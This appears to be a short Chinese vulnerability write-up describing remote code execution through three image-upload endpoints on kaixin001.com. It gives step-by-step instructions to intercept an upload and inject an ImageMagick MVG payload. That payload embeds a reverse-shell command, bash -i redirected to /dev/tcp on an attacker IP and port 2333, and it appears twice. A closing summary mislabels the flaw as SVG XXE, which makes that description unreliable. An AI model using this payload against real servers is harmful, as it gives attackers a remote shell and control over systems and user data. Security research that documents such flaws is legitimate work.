漏洞细节
漏洞URL1:http://www.kaixin001.com/set/logo.php
在修改头像处,上传正常图片的时候抓包,把下面这个payload直接添加上去就可以直接反弹shell
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context

漏洞URL2:http://www.kaixin001.com/photo/upload.php
漏洞URL3:http://www.kaixin001.com/lifetime/perfect.php
上传图片处

用以下payload
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context
上传一个正常的照片,然后抓包添加payload,上传之后可反弹shell


本文详细分析了开心网logo.php、upload.php和perfect.php等文件中存在的SVG XXE漏洞,通过特定payload可在上传图片时反弹Shell,实现远程代码执行。文章提供了具体的漏洞利用方法及payload示例。
895

被折叠的 条评论
为什么被折叠?



